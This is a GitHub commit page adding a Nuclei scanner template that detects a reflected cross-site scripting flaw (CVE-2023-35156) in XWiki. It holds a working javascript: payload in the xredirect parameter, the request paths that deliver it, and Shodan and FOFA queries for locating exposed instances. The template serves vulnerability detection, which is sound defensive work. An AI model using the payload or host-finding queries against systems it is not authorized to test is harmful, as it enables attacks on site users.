Merge pull request #10199 from projectdiscovery/CVE-2023-35156

Create CVE-2023-35156.yaml
patch-4
Dhiyaneshwaran 2024-07-04 18:55:45 +05:30 committed by GitHub
commit 6a66405277
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 54 additions and 0 deletions

View File

@ -0,0 +1,54 @@
id: CVE-2023-35156
info:
name: XWiki >= 6.0-rc-1 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the delete template to perform a XSS, e.g. by using URL such as: > xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 6.0-rc-1.
impact: |
Successful exploitation could lead to cross-site scripting.
remediation: |
This vulnerability has been patched in XWiki 14.10.6,15.1.
reference:
- https://jira.xwiki.org/browse/XWIKI-20341
- https://nvd.nist.gov/vuln/detail/CVE-2023-35156
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-35156
cwe-id: CWE-79
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
max-request: 2
verified: true
vendor: xwiki
product: xwiki
shodan-query: html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
tags: cve,cve2023,xwiki,xss
http:
- method: GET
path:
- "{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)"
- "{{BaseURL}}/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'cancel" href="javascript:alert(document.domain)'
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
- 401